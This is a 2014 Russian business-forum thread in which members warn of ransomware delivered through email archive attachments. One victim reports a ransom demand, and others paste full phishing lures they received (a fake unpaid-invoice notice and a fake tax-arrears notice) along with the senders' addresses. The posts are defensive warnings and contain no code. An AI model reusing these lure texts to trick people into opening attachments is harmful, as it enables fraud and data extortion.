Непрочитанное сообщениеДобавлено: 19 авг 2014, 10:34 
Не в сети

Зарегистрирован: 23 апр 2012, 10:10
Сообщения: 85
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Тоже сегодня с почты одного из арматурщиков пришло письмо
"Высылаем Вам акт сверки, просьба подписать и вернуть обратно"
Во вложении архивный файл.
Открыл, и через 30 минут на компе ни одного файла не осталось, все зашифрованные(((
Списался с этими пидорами, просят 600 евро за восстановаление 15000 файлов.
Касперский молчал...

Интерент прошерстил, на форуме касперского и доктора web написали -без вариантов!
Или формат всех дисков с полным удалением ВСЕХ файлов (вся база, вся переписка, база 1С, все фотографии за 7 крайних лет)
Или платите деньги!
Адрес с которого пишут Вам мошенники может быть любым, масса способов написать Вам письмо "с почты знакомого Вам человека"
а сам потом они выходят на связь с почты PayCrypt Seller <paycrypt@gmail.com>
Будьте аккуратны!!!


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 19 авг 2014, 11:45 
Аватара пользователя
E-mail: info@ctpa.ru
 Ответить с цитатой Ответить на тему 
Я одного не понимаю. У нас вся важная информация на сервере хранится, там 1С и прочее. Если у меня кто то из сотрудников откроет такой файл и с его компьютера есть доступ к серваку, то получается что файлы и на сервере зашифруются? Заранее прошу прощения за глупый вопрос)))


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 19 авг 2014, 13:25 
Не в сети
Аватара пользователя

Зарегистрирован: 10 май 2011, 08:07
Сообщения: 156
Благодарил (а): 73 раз.
Поблагодарили: 55 раз.
Заслуженная репутация: 1
 Ответить с цитатой Ответить на тему 
Максим( ООО ЦТПА) писал(а):

Я одного не понимаю. У нас вся важная информация на сервере хранится, там 1С и прочее. Если у меня кто то из сотрудников откроет такой файл и с его компьютера есть доступ к серваку, то получается что файлы и на сервере зашифруются? Заранее прошу прощения за глупый вопрос)))

Тут не узнаешь,пока не попробуешь))если в скрипте есть распространение по локальным сетям,то вполне возможно.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 06:51 
Не в сети

Зарегистрирован: 07 апр 2011, 12:45
Сообщения: 332
Благодарил (а): 10 раз.
Поблагодарили: 119 раз.
Заслуженная репутация: 2
 Ответить с цитатой Ответить на тему 
пришло сегодня, внутри архив со скриптом, открывать не стал, похоже что то подобное

про таких первый раз слышу, будьте внимательнее!!!!!!!!!!

почта nadezhda.zul@yandex.ru Зулкарнаева Надежда



Здравствуйте,
Прошу Вас проверить оплату по договору с ООО "УралМетМаш". По нашей информации Вами не было оплачено два счета за поставку метала (сканы счетов во вложении).
Надеюсь на оперативный ответ, поскольку наша юридическая служба уже готовит документы к взысканию дебиторки.

--
С уважением к Вам и Вашей работе-
ООО Производственное предприятие "УралМетМаш"


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 07:29 
Не в сети
Аватара пользователя

Зарегистрирован: 07 авг 2013, 14:35
Сообщения: 395
Откуда: Новосибирск
Благодарил (а): 9 раз.
Поблагодарили: 10 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
вот это дела! аж страшно становится


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 07:40 
Не в сети

Зарегистрирован: 07 апр 2011, 12:45
Сообщения: 332
Благодарил (а): 10 раз.
Поблагодарили: 119 раз.
Заслуженная репутация: 2
 Ответить с цитатой Ответить на тему 
ТЕПЕРЬ КАЖДОЕ ПИСЬМО ПРЕЖДЕ ЧЕМ ОТКРЫТЬ, ЛУЧШЕ ВНИМАТЕЛЬНО ИЗУЧИТЬ! sm_10

МОЖЕТ СОСТАВЛЯТЬ БАЗУ ЭЛЕКТРОННЫХ ЯЩИКОВ, ОТКУДА ВСЕ ЭТО СЫПЕТСЯ??


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 07:43 
Не в сети
Аватара пользователя

Зарегистрирован: 07 авг 2013, 14:35
Сообщения: 395
Откуда: Новосибирск
Благодарил (а): 9 раз.
Поблагодарили: 10 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
да по запарке запросто можешь открыть такое письмо, особенно когда работы валом


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 09:17 
Не в сети
Аватара пользователя

Зарегистрирован: 12 окт 2011, 08:13
Сообщения: 516
Откуда: Барнео
Благодарил (а): 3 раз.
Поблагодарили: 199 раз.
Заслуженная репутация: 6
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
вчера пришло:
Уважаемый налогоплательщик! По состоянию на 1.08.2014 за вами числится недоимка
в размере 4700 руб.Согласно порядку списания недоимки и задолженности по пеням,
штрафам и процентам, признанным безнадежными к взысканию, утвержденым приказом
ФНС России от 19.08.10 № ЯК-7-8/393@. будут предприняты следующие действия:

1) направление налогоплательщику требование об уплате налога, сбора и
соответствующей суммы пени;
2) принятие решение о взыскании налога, сбора и соответствующей суммы пени,
которое является основанием для бесспорного взыскания;
3) по истечении срока исполнения требования об уплате налога, сбора составить
на основании решения инкассовое поручение на списание денежных средств
и направить его в ваш банк.

Подробности списания недоимки с банковского счёта в прикреплённом архиве.

Уведомление" <yaroslavyanchupov790@bk.ru>

_________________
Изготовление промышленного котельного и вспомогательного оборудования.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 09:21 
Не в сети
Аватара пользователя

Зарегистрирован: 07 авг 2013, 14:35
Сообщения: 395
Откуда: Новосибирск
Благодарил (а): 9 раз.
Поблагодарили: 10 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
ФНС официальным уведомление по почте такие вещи шлет


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 авг 2014, 11:41 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Добрый день!
К нам на предприятие сегодня тоже пришло письмо с УралМетМаша. Касперский, слава богу, отработал. Но даже страшно представить, чтобы было, если бы не смог... Спасибо, что подняли такую важную тему! Нигде в интернете практически нет информации по данному вопросу.


Вернуться к началу
  Ответить с цитатой Ответить на тему   
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  Страница 1 из 2  [ Сообщений: 57 ]  На страницу 1, 2  След.

Быстрый ответ
Вы не можете оставлять комментарии и ответы, пожалуйста ЗАРЕГИСТРИРУЙТЕСЬ для возможности полноценного доступа к форумам этой ветки

Часовой пояс: UTC + 3 часа [ Летнее время ]


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 3


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти: 
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group [ Time : 0.925s | 139 Queries | GZIP : Off ]

@Mail.ru
Администрация портала не несёт ответственности за достоверность размещённой в сообщениях форума информации.